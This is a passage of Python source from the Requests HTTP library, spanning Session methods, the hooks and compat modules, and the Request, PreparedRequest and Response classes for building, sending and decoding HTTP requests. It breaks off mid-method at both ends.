certificate default, if String, path to ssl client #: cert file (.pem). If Tuple, ('cert', 'key') pair. self.cert = None #: Maximum number of redirects allowed. If the request exceeds this #: limit, a :class:`TooManyRedirects` exception is raised. #: This defaults to requests.models.DEFAULT_REDIRECT_LIMIT, which is #: 30. self.max_redirects = DEFAULT_REDIRECT_LIMIT #: Trust environment settings for proxy configuration, default #: authentication and similar. self.trust_env = True #: A CookieJar containing all currently outstanding cookies set on this #: session. By default it is a #: :class:`RequestsCookieJar <requests.cookies.RequestsCookieJar>`, but #: may be any other ``cookielib.CookieJar`` compatible object. self.cookies = cookiejar_from_dict({}) # Default connection adapters. self.adapters = OrderedDict() self.mount("https://", HTTPAdapter()) self.mount("http://", HTTPAdapter()) def __enter__(self): return self def __exit__(self, *args): self.close() def prepare_request(self, request): """Constructs a :class:`PreparedRequest <PreparedRequest>` for transmission and returns it. The :class:`PreparedRequest` has settings merged from the :class:`Request <Request>` instance and those of the :class:`Session`. :param request: :class:`Request` instance to prepare with this session's settings. :rtype: requests.PreparedRequest """ cookies = request.cookies or {} # Bootstrap CookieJar. if not isinstance(cookies, cookielib.CookieJar): cookies = cookiejar_from_dict(cookies) # Merge with session cookies merged_cookies = merge_cookies( merge_cookies(RequestsCookieJar(), self.cookies), cookies ) # Set environment's basic authentication if not explicitly set. auth = request.auth if self.trust_env and not auth and not self.auth: auth = get_netrc_auth(request.url) p = PreparedRequest() p.prepare( method=request.method.upper(), url=request.url, files=request.files, data=request.data, json=request.json, headers=merge_setting( request.headers, self.headers, dict_class=CaseInsensitiveDict ), params=merge_setting(request.params, self.params), auth=merge_setting(auth, self.auth), cookies=merged_cookies, hooks=merge_hooks(request.hooks, self.hooks), ) return p def request( self, method, url, params=None, data=None, headers=None, cookies=None, files=None, auth=None, timeout=None, allow_redirects=True, proxies=None, hooks=None, stream=None, verify=None, cert=None, json=None, ): """Constructs a :class:`Request <Request>`, prepares it and sends it. Returns :class:`Response <Response>` object. :param method: method for the new :class:`Request` object. :param url: URL for the new :class:`Request` object. :param params: (optional) Dictionary or bytes to be sent in the query string for the :class:`Request`. :param data: (optional) Dictionary, list of tuples, bytes, or file-like object to send in the body of the :class:`Request`. :param json: (optional) json to send in the body of the :class:`Request`. :param headers: (optional) Dictionary of HTTP Headers to send with the :class:`Request`. :param cookies: (optional) Dict or CookieJar object to send with the :class:`Request`. :param files: (optional) Dictionary of ``'filename': file-like-objects`` for multipart encoding upload. :param auth: (optional) Auth tuple or callable to enable Basic/Digest/Custom HTTP Auth. :param timeout: (optional) How long to wait for the server to send data before giving up, as a float, or a :ref:`(connect timeout, read timeout) <timeouts>` tuple. :type timeout: float or tuple :param allow_redirects: (optional) Set to True by default. :type allow_redirects: bool :param proxies: (optional) Dictionary mapping protocol or protocol and hostname to the URL of the proxy. :param hooks: (optional) Dictionary mapping hook name to one event or list of events, event must be callable. :param stream: (optional) whether to immediately download the response content. Defaults to ``False``. :param verify: (optional) Either a boolean, in which case it controls whether we verify the server's TLS certificate, or a string, in which case it must be a path to a CA bundle to use. Defaults to ``True``. When set to ``False``, requests will accept any TLS certificate presented by the server, and will ignore hostname mismatches and/or expired certificates, which will make your application vulnerable to man-in-the-middle (MitM) attacks. Setting verify to ``False`` may be useful during local development or testing. :param cert: (optional) if String, path to ssl client cert file (.pem). If Tuple, ('cert', 'key') pair. :rtype: requests.Response """ # Create the Request. req = Request( method=method.upper(), url=url, headers=headers, files=files, data=data or {}, json=json, params=params or {}, auth=auth, cookies=cookies, hooks=hooks, ) prep = self.prepare_request(req) proxies = proxies or {} settings = self.merge_environment_settings( prep.url, proxies, stream, verify, cert ) # Send the request. send_kwargs = { "timeout": timeout, "allow_redirects": allow_redirects, } send_kwargs.update(settings) resp = self.send(prep, **send_kwargs) return resp def get(self, url, **kwargs): r"""Sends a GET request. Returns :class:`Response` object. :param url: URL for the new :class:`Request` object. :param \*\*kwargs: Optional arguments that ``request`` takes. :rtype: requests.Response """ kwargs.setdefault("allow_redirects", True) return self.request("GET", url, **kwargs) def options(self, url, **kwargs): r"""Sends a OPTIONS request. Returns :class:`Response` object. :param url: URL for the new :class:`Request` object. :param \*\*kwargs: Optional arguments that ``request`` takes. :rtype: requests.Response """ kwargs.setdefault("allow_redirects", True) return self.request("OPTIONS", url, **kwargs) def head(self, url, **kwargs): r"""Sends a HEAD request. Returns :class:`Response` object. :param url: URL for the new :class:`Request` object. :param \*\*kwargs: Optional arguments that ``request`` takes. :rtype: requests.Response """ kwargs.setdefault("allow_redirects", False) return self.request("HEAD", url, **kwargs) def post(self, url, data=None, json=None, **kwargs): r"""Sends a POST request. Returns :class:`Response` object. :param url: URL for the new :class:`Request` object. :param data: (optional) Dictionary, list of tuples, bytes, or file-like object to send in the body of the :class:`Request`. :param json: (optional) json to send in the body of the :class:`Request`. :param \*\*kwargs: Optional arguments that ``request`` takes. :rtype: requests.Response """ return self.request("POST", url, data=data, json=json, **kwargs) def put(self, url, data=None, **kwargs): r"""Sends a PUT request. Returns :class:`Response` object. :param url: URL for the new :class:`Request` object. :param data: (optional) Dictionary, list of tuples, bytes, or file-like object to send in the body of the :class:`Request`. :param \*\*kwargs: Optional arguments that ``request`` takes. :rtype: requests.Response """ return self.request("PUT", url, data=data, **kwargs) def patch(self, url, data=None, **kwargs): r"""Sends a PATCH request. Returns :class:`Response` object. :param url: URL for the new :class:`Request` object. :param data: (optional) Dictionary, list of tuples, bytes, or file-like object to send in the body of the :class:`Request`. :param \*\*kwargs: Optional arguments that ``request`` takes. :rtype: requests.Response """ return self.request("PATCH", url, data=data, **kwargs) def delete(self, url, **kwargs): r"""Sends a DELETE request. Returns :class:`Response` object. :param url: URL for the new :class:`Request` object. :param \*\*kwargs: Optional arguments that ``request`` takes. :rtype: requests.Response """ return self.request("DELETE", url, **kwargs) def send(self, request, **kwargs): """Send a given PreparedRequest. :rtype: requests.Response """ # Set defaults that the hooks can utilize to ensure they always have # the correct parameters to reproduce the previous request. kwargs.setdefault("stream", self.stream) kwargs.setdefault("verify", self.verify) kwargs.setdefault("cert", self.cert) if "proxies" not in kwargs: kwargs["proxies"] = resolve_proxies(request, self.proxies, self.trust_env) # It's possible that users might accidentally send a Request object. # Guard against that specific failure case. if isinstance(request, Request): raise ValueError("You can only send PreparedRequests.") # Set up variables needed for resolve_redirects and dispatching of hooks allow_redirects = kwargs.pop("allow_redirects", True) stream = kwargs.get("stream") hooks = request.hooks # Get the appropriate adapter to use adapter = self.get_adapter(url=request.url) # Start time (approximately) of the request start = preferred_clock() # Send the request r = adapter.send(request, **kwargs) # Total elapsed time of the request (approximately) elapsed = preferred_clock() - start r.elapsed = timedelta(seconds=elapsed) # Response manipulation hooks r = dispatch_hook("response", hooks, r, **kwargs) # Persist cookies if r.history: # If the hooks create history then we want those cookies too for resp in r.history: extract_cookies_to_jar(self.cookies, resp.request, resp.raw) extract_cookies_to_jar(self.cookies, request, r.raw) # Resolve redirects if allowed. if allow_redirects: # Redirect resolving generator. gen = self.resolve_redirects(r, request, **kwargs) history = [resp for resp in gen] else: history = [] # Shuffle things around if there's history. if history: # Insert the first (original) request at the start history.insert(0, r) # Get the last request made r = history.pop() r.history = history # If redirects aren't being followed, store the response on the Request for Response.next(). if not allow_redirects: try: r._next = next( self.resolve_redirects(r, request, yield_requests=True, **kwargs) ) except StopIteration: pass if not stream: r.content return r def merge_environment_settings(self, url, proxies, stream, verify, cert): """ Check the environment and merge it with some settings. :rtype: dict """ # Gather clues from the surrounding environment. if self.trust_env: # Set environment's proxies. no_proxy = proxies.get("no_proxy") if proxies is not None else None env_proxies = get_environ_proxies(url, no_proxy=no_proxy) for k, v in env_proxies.items(): proxies.setdefault(k, v) # Look for requests environment configuration # and be compatible with cURL. if verify is True or verify is None: verify = ( os.environ.get("REQUESTS_CA_BUNDLE") or os.environ.get("CURL_CA_BUNDLE") or verify ) # Merge all the kwargs. proxies = merge_setting(proxies, self.proxies) stream = merge_setting(stream, self.stream) verify = merge_setting(verify, self.verify) cert = merge_setting(cert, self.cert) return {"proxies": proxies, "stream": stream, "verify": verify, "cert": cert} def get_adapter(self, url): """ Returns the appropriate connection adapter for the given URL. :rtype: requests.adapters.BaseAdapter """ for prefix, adapter in self.adapters.items(): if url.lower().startswith(prefix.lower()): return adapter # Nothing matches :-/ raise InvalidSchema(f"No connection adapters were found for {url!r}") def close(self): """Closes all adapters and as such the session""" for v in self.adapters.values(): v.close() def mount(self, prefix, adapter): """Registers a connection adapter to a prefix. Adapters are sorted in descending order by prefix length. """ self.adapters[prefix] = adapter keys_to_move = [k for k in self.adapters if len(k) < len(prefix)] for key in keys_to_move: self.adapters[key] = self.adapters.pop(key) def __getstate__(self): state = {attr: getattr(self, attr, None) for attr in self.__attrs__} return state def __setstate__(self, state): for attr, value in state.items(): setattr(self, attr, value) def session(): """ Returns a :class:`Session` for context-management. .. deprecated:: 1.0.0 This method has been deprecated since version 1.0.0 and is only kept for backwards compatibility. New code should use :class:`~requests.sessions.Session` to create a session. This may be removed at a future date. :rtype: Session """ return Session() File: src/requests/hooks.py """ requests.hooks ~~~~~~~~~~~~~~ This module provides the capabilities for the Requests hooks system. Available hooks: ``response``: The response generated from a Request. """ HOOKS = ["response"] def default_hooks(): return {event: [] for event in HOOKS} # TODO: response is the only one def dispatch_hook(key, hooks, hook_data, **kwargs): """Dispatches a hook dictionary on a given piece of data.""" hooks = hooks or {} hooks = hooks.get(key) if hooks: if hasattr(hooks, "__call__"): hooks = [hooks] for hook in hooks: _hook_data = hook(hook_data, **kwargs) if _hook_data is not None: hook_data = _hook_data return hook_data File: src/requests/compat.py """ requests.compat ~~~~~~~~~~~~~~~ This module previously handled import compatibility issues between Python 2 and Python 3. It remains for backwards compatibility until the next major version. """ import importlib import sys # ------- # urllib3 # ------- from urllib3 import __version__ as urllib3_version # Detect which major version of urllib3 is being used. try: is_urllib3_1 = int(urllib3_version.split(".")[0]) == 1 except (TypeError, AttributeError): # If we can't discern a version, prefer old functionality. is_urllib3_1 = True # ------------------- # Character Detection # ------------------- def _resolve_char_detection(): """Find supported character detection libraries.""" chardet = None for lib in ("chardet", "charset_normalizer"): if chardet is None: try: chardet = importlib.import_module(lib) except ImportError: pass return chardet chardet = _resolve_char_detection() # ------- # Pythons # ------- # Syntax sugar. _ver = sys.version_info #: Python 2.x? is_py2 = _ver[0] == 2 #: Python 3.x? is_py3 = _ver[0] == 3 # json/simplejson module import resolution has_simplejson = False try: import simplejson as json has_simplejson = True except ImportError: import json if has_simplejson: from simplejson import JSONDecodeError else: from json import JSONDecodeError # Keep OrderedDict for backwards compatibility. from collections import OrderedDict from collections.abc import Callable, Mapping, MutableMapping from http import cookiejar as cookielib from http.cookies import Morsel from io import StringIO # -------------- # Legacy Imports # -------------- from urllib.parse import ( quote, quote_plus, unquote, unquote_plus, urldefrag, urlencode, urljoin, urlparse, urlsplit, urlunparse, ) from urllib.request import ( getproxies, getproxies_environment, parse_http_list, proxy_bypass, proxy_bypass_environment, ) builtin_str = str str = str bytes = bytes basestring = (str, bytes) numeric_types = (int, float) integer_types = (int,) File: src/requests/models.py """ requests.models ~~~~~~~~~~~~~~~ This module contains the primary objects that power Requests. """ import datetime # Import encoding now, to avoid implicit import later. # Implicit import within threads may cause LookupError when standard library is in a ZIP, # such as in Embedded Python. See https://github.com/psf/requests/issues/3578. import encodings.idna # noqa: F401 from io import UnsupportedOperation from urllib3.exceptions import ( DecodeError, LocationParseError, ProtocolError, ReadTimeoutError, SSLError, ) from urllib3.fields import RequestField from urllib3.filepost import encode_multipart_formdata from urllib3.util import parse_url from ._internal_utils import to_native_string, unicode_is_ascii from .auth import HTTPBasicAuth from .compat import ( Callable, JSONDecodeError, Mapping, basestring, builtin_str, chardet, cookielib, ) from .compat import json as complexjson from .compat import urlencode, urlsplit, urlunparse from .cookies import _copy_cookie_jar, cookiejar_from_dict, get_cookie_header from .exceptions import ( ChunkedEncodingError, ConnectionError, ContentDecodingError, HTTPError, InvalidJSONError, InvalidURL, ) from .exceptions import JSONDecodeError as RequestsJSONDecodeError from .exceptions import MissingSchema from .exceptions import SSLError as RequestsSSLError from .exceptions import StreamConsumedError from .hooks import default_hooks from .status_codes import codes from .structures import CaseInsensitiveDict from .utils import ( check_header_validity, get_auth_from_url, guess_filename, guess_json_utf, iter_slices, parse_header_links, requote_uri, stream_decode_response_unicode, super_len, to_key_val_list, ) #: The set of HTTP status codes that indicate an automatically #: processable redirect. REDIRECT_STATI = ( codes.moved, # 301 codes.found, # 302 codes.other, # 303 codes.temporary_redirect, # 307 codes.permanent_redirect, # 308 ) DEFAULT_REDIRECT_LIMIT = 30 CONTENT_CHUNK_SIZE = 10 * 1024 ITER_CHUNK_SIZE = 512 class RequestEncodingMixin: @property def path_url(self): """Build the path URL to use.""" url = [] p = urlsplit(self.url) path = p.path if not path: path = "/" url.append(path) query = p.query if query: url.append("?") url.append(query) return "".join(url) @staticmethod def _encode_params(data): """Encode parameters in a piece of data. Will successfully encode parameters when passed as a dict or a list of 2-tuples. Order is retained if data is a list of 2-tuples but arbitrary if parameters are supplied as a dict. """ if isinstance(data, (str, bytes)): return data elif hasattr(data, "read"): return data elif hasattr(data, "__iter__"): result = [] for k, vs in to_key_val_list(data): if isinstance(vs, basestring) or not hasattr(vs, "__iter__"): vs = [vs] for v in vs: if v is not None: result.append( ( k.encode("utf-8") if isinstance(k, str) else k, v.encode("utf-8") if isinstance(v, str) else v, ) ) return urlencode(result, doseq=True) else: return data @staticmethod def _encode_files(files, data): """Build the body for a multipart/form-data request. Will successfully encode files when passed as a dict or a list of tuples. Order is retained if data is a list of tuples but arbitrary if parameters are supplied as a dict. The tuples may be 2-tuples (filename, fileobj), 3-tuples (filename, fileobj, contentype) or 4-tuples (filename, fileobj, contentype, custom_headers). """ if not files: raise ValueError("Files must be provided.") elif isinstance(data, basestring): raise ValueError("Data must not be a string.") new_fields = [] fields = to_key_val_list(data or {}) files = to_key_val_list(files or {}) for field, val in fields: if isinstance(val, basestring) or not hasattr(val, "__iter__"): val = [val] for v in val: if v is not None: # Don't call str() on bytestrings: in Py3 it all goes wrong. if not isinstance(v, bytes): v = str(v) new_fields.append( ( field.decode("utf-8") if isinstance(field, bytes) else field, v.encode("utf-8") if isinstance(v, str) else v, ) ) for k, v in files: # support for explicit filename ft = None fh = None if isinstance(v, (tuple, list)): if len(v) == 2: fn, fp = v elif len(v) == 3: fn, fp, ft = v else: fn, fp, ft, fh = v else: fn = guess_filename(v) or k fp = v if isinstance(fp, (str, bytes, bytearray)): fdata = fp elif hasattr(fp, "read"): fdata = fp.read() elif fp is None: continue else: fdata = fp rf = RequestField(name=k, data=fdata, filename=fn, headers=fh) rf.make_multipart(content_type=ft) new_fields.append(rf) body, content_type = encode_multipart_formdata(new_fields) return body, content_type class RequestHooksMixin: def register_hook(self, event, hook): """Properly register a hook.""" if event not in self.hooks: raise ValueError(f'Unsupported event specified, with event name "{event}"') if isinstance(hook, Callable): self.hooks[event].append(hook) elif hasattr(hook, "__iter__"): self.hooks[event].extend(h for h in hook if isinstance(h, Callable)) def deregister_hook(self, event, hook): """Deregister a previously registered hook. Returns True if the hook existed, False if not. """ try: self.hooks[event].remove(hook) return True except ValueError: return False class Request(RequestHooksMixin): """A user-created :class:`Request <Request>` object. Used to prepare a :class:`PreparedRequest <PreparedRequest>`, which is sent to the server. :param method: HTTP method to use. :param url: URL to send. :param headers: dictionary of headers to send. :param files: dictionary of {filename: fileobject} files to multipart upload. :param data: the body to attach to the request. If a dictionary or list of tuples ``[(key, value)]`` is provided, form-encoding will take place. :param json: json for the body to attach to the request (if files or data is not specified). :param params: URL parameters to append to the URL. If a dictionary or list of tuples ``[(key, value)]`` is provided, form-encoding will take place. :param auth: Auth handler or (user, pass) tuple. :param cookies: dictionary or CookieJar of cookies to attach to this request. :param hooks: dictionary of callback hooks, for internal usage. Usage:: >>> import requests >>> req = requests.Request('GET', 'https://httpbin.org/get') >>> req.prepare() <PreparedRequest [GET]> """ def __init__( self, method=None, url=None, headers=None, files=None, data=None, params=None, auth=None, cookies=None, hooks=None, json=None, ): # Default empty dicts for dict params. data = [] if data is None else data files = [] if files is None else files headers = {} if headers is None else headers params = {} if params is None else params hooks = {} if hooks is None else hooks self.hooks = default_hooks() for k, v in list(hooks.items()): self.register_hook(event=k, hook=v) self.method = method self.url = url self.headers = headers self.files = files self.data = data self.json = json self.params = params self.auth = auth self.cookies = cookies def __repr__(self): return f"<Request [{self.method}]>" def prepare(self): """Constructs a :class:`PreparedRequest <PreparedRequest>` for transmission and returns it.""" p = PreparedRequest() p.prepare( method=self.method, url=self.url, headers=self.headers, files=self.files, data=self.data, json=self.json, params=self.params, auth=self.auth, cookies=self.cookies, hooks=self.hooks, ) return p class PreparedRequest(RequestEncodingMixin, RequestHooksMixin): """The fully mutable :class:`PreparedRequest <PreparedRequest>` object, containing the exact bytes that will be sent to the server. Instances are generated from a :class:`Request <Request>` object, and should not be instantiated manually; doing so may produce undesirable effects. Usage:: >>> import requests >>> req = requests.Request('GET', 'https://httpbin.org/get') >>> r = req.prepare() >>> r <PreparedRequest [GET]> >>> s = requests.Session() >>> s.send(r) <Response [200]> """ def __init__(self): #: HTTP verb to send to the server. self.method = None #: HTTP URL to send the request to. self.url = None #: dictionary of HTTP headers. self.headers = None # The `CookieJar` used to create the Cookie header will be stored here # after prepare_cookies is called self._cookies = None #: request body to send to the server. self.body = None #: dictionary of callback hooks, for internal usage. self.hooks = default_hooks() #: integer denoting starting position of a readable file-like body. self._body_position = None def prepare( self, method=None, url=None, headers=None, files=None, data=None, params=None, auth=None, cookies=None, hooks=None, json=None, ): """Prepares the entire request with the given parameters.""" self.prepare_method(method) self.prepare_url(url, params) self.prepare_headers(headers) self.prepare_cookies(cookies) self.prepare_body(data, files, json) self.prepare_auth(auth, url) # Note that prepare_auth must be last to enable authentication schemes # such as OAuth to work on a fully prepared request. # This MUST go after prepare_auth. Authenticators could add a hook self.prepare_hooks(hooks) def __repr__(self): return f"<PreparedRequest [{self.method}]>" def copy(self): p = PreparedRequest() p.method = self.method p.url = self.url p.headers = self.headers.copy() if self.headers is not None else None p._cookies = _copy_cookie_jar(self._cookies) p.body = self.body p.hooks = self.hooks p._body_position = self._body_position return p def prepare_method(self, method): """Prepares the given HTTP method.""" self.method = method if self.method is not None: self.method = to_native_string(self.method.upper()) @staticmethod def _get_idna_encoded_host(host): import idna try: host = idna.encode(host, uts46=True).decode("utf-8") except idna.IDNAError: raise UnicodeError return host def prepare_url(self, url, params): """Prepares the given HTTP URL.""" #: Accept objects that have string representations. #: We're unable to blindly call unicode/str functions #: as this will include the bytestring indicator (b'') #: on python 3.x. #: https://github.com/psf/requests/pull/2238 if isinstance(url, bytes): url = url.decode("utf8") else: url = str(url) # Remove leading whitespaces from url url = url.lstrip() # Don't do any URL preparation for non-HTTP schemes like `mailto`, # `data` etc to work around exceptions from `url_parse`, which # handles RFC 3986 only. if ":" in url and not url.lower().startswith("http"): self.url = url return # Support for unicode domain names and paths. try: scheme, auth, host, port, path, query, fragment = parse_url(url) except LocationParseError as e: raise InvalidURL(*e.args) if not scheme: raise MissingSchema( f"Invalid URL {url!r}: No scheme supplied. " f"Perhaps you meant https://{url}?" ) if not host: raise InvalidURL(f"Invalid URL {url!r}: No host supplied") # In general, we want to try IDNA encoding the hostname if the string contains # non-ASCII characters. This allows users to automatically get the correct IDNA # behaviour. For strings containing only ASCII characters, we need to also verify # it doesn't start with a wildcard (*), before allowing the unencoded hostname. if not unicode_is_ascii(host): try: host = self._get_idna_encoded_host(host) except UnicodeError: raise InvalidURL("URL has an invalid label.") elif host.startswith(("*", ".")): raise InvalidURL("URL has an invalid label.") # Carefully reconstruct the network location netloc = auth or "" if netloc: netloc += "@" netloc += host if port: netloc += f":{port}" # Bare domains aren't valid URLs. if not path: path = "/" if isinstance(params, (str, bytes)): params = to_native_string(params) enc_params = self._encode_params(params) if enc_params: if query: query = f"{query}&{enc_params}" else: query = enc_params url = requote_uri(urlunparse([scheme, netloc, path, None, query, fragment])) self.url = url def prepare_headers(self, headers): """Prepares the given HTTP headers.""" self.headers = CaseInsensitiveDict() if headers: for header in headers.items(): # Raise exception on invalid header value. check_header_validity(header) name, value = header self.headers[to_native_string(name)] = value def prepare_body(self, data, files, json=None): """Prepares the given HTTP body data.""" # Check if file, fo, generator, iterator. # If not, run through normal process. # Nottin' on you. body = None content_type = None if not data and json is not None: # urllib3 requires a bytes-like body. Python 2's json.dumps # provides this natively, but Python 3 gives a Unicode string. content_type = "application/json" try: body = complexjson.dumps(json, allow_nan=False) except ValueError as ve: raise InvalidJSONError(ve, request=self) if not isinstance(body, bytes): body = body.encode("utf-8") is_stream = all( [ hasattr(data, "__iter__"), not isinstance(data, (basestring, list, tuple, Mapping)), ] ) if is_stream: try: length = super_len(data) except (TypeError, AttributeError, UnsupportedOperation): length = None body = data if getattr(body, "tell", None) is not None: # Record the current file position before reading. # This will allow us to rewind a file in the event # of a redirect. try: self._body_position = body.tell() except OSError: # This differentiates from None, allowing us to catch # a failed `tell()` later when trying to rewind the body self._body_position = object() if files: raise NotImplementedError( "Streamed bodies and files are mutually exclusive." ) if length: self.headers["Content-Length"] = builtin_str(length) else: self.headers["Transfer-Encoding"] = "chunked" else: # Multi-part file uploads. if files: (body, content_type) = self._encode_files(files, data) else: if data: body = self._encode_params(data) if isinstance(data, basestring) or hasattr(data, "read"): content_type = None else: content_type = "application/x-www-form-urlencoded" self.prepare_content_length(body) # Add content-type if it wasn't explicitly provided. if content_type and ("content-type" not in self.headers): self.headers["Content-Type"] = content_type self.body = body def prepare_content_length(self, body): """Prepare Content-Length header based on request method and body""" if body is not None: length = super_len(body) if length: # If length exists, set it. Otherwise, we fallback # to Transfer-Encoding: chunked. self.headers["Content-Length"] = builtin_str(length) elif ( self.method not in ("GET", "HEAD") and self.headers.get("Content-Length") is None ): # Set Content-Length to 0 for methods that can have a body # but don't provide one. (i.e. not GET or HEAD) self.headers["Content-Length"] = "0" def prepare_auth(self, auth, url=""): """Prepares the given HTTP auth data.""" # If no Auth is explicitly provided, extract it from the URL first. if auth is None: url_auth = get_auth_from_url(self.url) auth = url_auth if any(url_auth) else None if auth: if isinstance(auth, tuple) and len(auth) == 2: # special-case basic HTTP auth auth = HTTPBasicAuth(*auth) # Allow auth to make its changes. r = auth(self) # Update self to reflect the auth changes. self.__dict__.update(r.__dict__) # Recompute Content-Length self.prepare_content_length(self.body) def prepare_cookies(self, cookies): """Prepares the given HTTP cookie data. This function eventually generates a ``Cookie`` header from the given cookies using cookielib. Due to cookielib's design, the header will not be regenerated if it already exists, meaning this function can only be called once for the life of the :class:`PreparedRequest <PreparedRequest>` object. Any subsequent calls to ``prepare_cookies`` will have no actual effect, unless the "Cookie" header is removed beforehand. """ if isinstance(cookies, cookielib.CookieJar): self._cookies = cookies else: self._cookies = cookiejar_from_dict(cookies) cookie_header = get_cookie_header(self._cookies, self) if cookie_header is not None: self.headers["Cookie"] = cookie_header def prepare_hooks(self, hooks): """Prepares the given hooks.""" # hooks can be passed as None to the prepare method and to this # method. To prevent iterating over None, simply use an empty list # if hooks is False-y hooks = hooks or [] for event in hooks: self.register_hook(event, hooks[event]) class Response: """The :class:`Response <Response>` object, which contains a server's response to an HTTP request. """ __attrs__ = [ "_content", "status_code", "headers", "url", "history", "encoding", "reason", "cookies", "elapsed", "request", ] def __init__(self): self._content = False self._content_consumed = False self._next = None #: Integer Code of responded HTTP Status, e.g. 404 or 200. self.status_code = None #: Case-insensitive Dictionary of Response Headers. #: For example, ``headers['content-encoding']`` will return the #: value of a ``'Content-Encoding'`` response header. self.headers = CaseInsensitiveDict() #: File-like object representation of response (for advanced usage). #: Use of ``raw`` requires that ``stream=True`` be set on the request. #: This requirement does not apply for use internally to Requests. self.raw = None #: Final URL location of Response. self.url = None #: Encoding to decode with when accessing r.text. self.encoding = None #: A list of :class:`Response <Response>` objects from #: the history of the Request. Any redirect responses will end #: up here. The list is sorted from the oldest to the most recent request. self.history = [] #: Textual reason of responded HTTP Status, e.g. "Not Found" or "OK". self.reason = None #: A CookieJar of Cookies the server sent back. self.cookies = cookiejar_from_dict({}) #: The amount of time elapsed between sending the request #: and the arrival of the response (as a timedelta). #: This property specifically measures the time taken between sending #: the first byte of the request and finishing parsing the headers. It #: is therefore unaffected by consuming the response content or the #: value of the ``stream`` keyword argument. self.elapsed = datetime.timedelta(0) #: The :class:`PreparedRequest <PreparedRequest>` object to which this #: is a response. self.request = None def __enter__(self): return self def __exit__(self, *args): self.close() def __getstate__(self): # Consume everything; accessing the content attribute makes # sure the content has been fully read. if not self._content_consumed: self.content return {attr: getattr(self, attr, None) for attr in self.__attrs__} def __setstate__(self, state): for name, value in state.items(): setattr(self, name, value) # pickled objects do not have .raw setattr(self, "_content_consumed", True) setattr(self, "raw", None) def __repr__(self): return f"<Response [{self.status_code}]>" def __bool__(self): """Returns True if :attr:`status_code` is less than 400. This attribute checks if the status code of the response is between 400 and 600 to see if there was a client error or a server error. If the status code, is between 200 and 400, this will return True. This is **not** a check to see if the response code is ``200 OK``. """ return self.ok def __nonzero__(self): """Returns True if :attr:`status_code` is less than 400. This attribute checks if the status code of the response is between 400 and 600 to see if there was a client error or a server error. If the status code, is between 200 and 400, this will return True. This is **not** a check to see if the response code is ``200 OK``. """ return self.ok def __iter__(self): """Allows you to use a response as an iterator.""" return self.iter_content(128) @property def ok(self): """Returns True if :attr:`status_code` is less than 400, False if not. This attribute checks if the status code of the response is between 400 and 600 to see if there was a client error or a server error. If the status code is between 200 and 400, this will return True. This is **not** a check to see if the response code is ``200 OK``. """ try: self.raise_for_status() except HTTPError: return False return True @property def is_redirect(self): """True if this Response is a well-formed HTTP redirect that could have been processed automatically (by :meth:`Session.resolve_redirects`). """ return "location" in self.headers and self.status_code in REDIRECT_STATI @property def is_permanent_redirect(self): """True if this Response one of the permanent versions of redirect.""" return "location" in self.headers and self.status_code in ( codes.moved_permanently, codes.permanent_redirect, ) @property def next(self): """Returns a PreparedRequest for the next request in a redirect chain, if there is one.""" return self._next @property def apparent_encoding(self): """The apparent encoding, provided by the charset_normalizer or chardet libraries.""" if chardet is not None: return chardet.detect(self.content)["encoding"] else: # If no character detection library is available, we'll fall back # to a standard Python utf-8 str. return "utf-8" def iter_content(self, chunk_size=1, decode_unicode=False): """Iterates over the response data. When stream=True is set on the request, this avoids reading the content at once into memory for large responses. The chunk size is the number of bytes it should read into memory. This is not necessarily the length of each item returned as decoding can take place. chunk_size must be of type int or None. A value of None will function differently depending on the value of `stream`. stream=True will read data as it arrives in whatever size the chunks are received. If stream=False, data is returned as a single chunk. If decode_unicode is True, content will be decoded using the best available encoding based on the response. """ def generate(): # Special case for urllib3. if hasattr(self.raw, "stream"): try: yield from self.raw.stream(chunk_size, decode_content=True) except ProtocolError as e: raise ChunkedEncodingError(e) except DecodeError as e: raise ContentDecodingError(e) except ReadTimeoutError as e: raise ConnectionError(e) except SSLError as e: raise RequestsSSLError(e) else: # Standard file-like object. while True: chunk = self.raw.read(chunk_size) if not chunk: break yield chunk self._content_consumed = True if self._content_consumed and isinstance(self._content, bool): raise StreamConsumedError() elif chunk_size is not None and not isinstance(chunk_size, int): raise TypeError( f"chunk_size must be an int, it is instead a {type(chunk_size)}." ) # simulate reading small chunks of the content reused_chunks = iter_slices(self._content, chunk_size) stream_chunks = generate() chunks = reused_chunks if self._content_consumed else stream_chunks if decode_unicode: chunks = stream_decode_response_unicode(chunks, self) return chunks def iter_lines( self, chunk_size=ITER_CHUNK_SIZE, decode_unicode=False, delimiter=None ): """Iterates over the response data, one line at a time. When stream=True is set on the request, this avoids reading the content at once into memory for large responses. .. note:: This method is not reentrant safe. """ pending = None for chunk in self.iter_content( chunk_size=chunk_size, decode_unicode=decode_unicode ): if pending is not None: chunk = pending + chunk if delimiter: lines = chunk.split(delimiter) else: lines = chunk.splitlines() if lines and lines[-1] and chunk and lines[-1][-1] == chunk[-1]: pending = lines.pop() else: pending = None yield from lines if pending is not None: yield pending @property def content(self): """Content of the response, in bytes.""" if self._content is False: # Read the contents. if self._content_consumed: raise RuntimeError("The content for this response was already consumed") if self.status_code == 0 or self.raw is None: self._content = None else: self._content = b"".join(self.iter_content(CONTENT_CHUNK_SIZE)) or b"" self._content_consumed = True # don't need to release the connection; that's been handled by urllib3 # since we exhausted the data. return self._content @property def text(self): """Content of the response, in unicode. If Response.encoding is None, encoding will be guessed using ``charset_normalizer`` or ``chardet``. The encoding of the response content is determined based solely on HTTP headers, following RFC 2616 to the letter. If you can take advantage of non-HTTP knowledge to make a better guess at the encoding, you should set ``r.encoding`` appropriately before accessing this property. """ # Try charset from content-type content = None encoding = self.encoding if not self.content: return "" # Fallback to auto-detected encoding. if self.encoding is None: encoding = self.apparent_encoding # Decode unicode from given encoding. try: content = str(self.content, encoding, errors="replace") except (LookupError, TypeError): # A LookupError is raised if the encoding was not found which could # indicate a misspelling or similar mistake. # # A TypeError can be raised if encoding is None # # So we try blindly encoding. content = str(self.content, errors="replace") return content def json(self, **kwargs): r"""Returns the json-encoded content of a response, if any. :param \*\*kwargs: Optional arguments that ``json.loads`` takes. :raises requests.exceptions.JSONDecodeError: If the response body does not contain valid json. """ if not self.encoding and self.content and len(self.content) > 3: # No encoding set. JSON RFC 4627 section 3 states we should expect # UTF-8, -16 or -32. Detect which one to use; If the detection or # decoding fails, fall back to `self.text` (using charset_normalizer to make # a best guess). encoding = guess_json_utf(self.content) if encoding is not None: try: return complexjson.loads(self.content.decode(encoding), **kwargs) except UnicodeDecodeError: # Wrong UTF codec detected; usually because it's not UTF-8 # but some other 8-bit codec. This is an RFC violation, # and the server didn't bother to tell us what codec *was* # used. pass except JSONDecodeError as e: raise 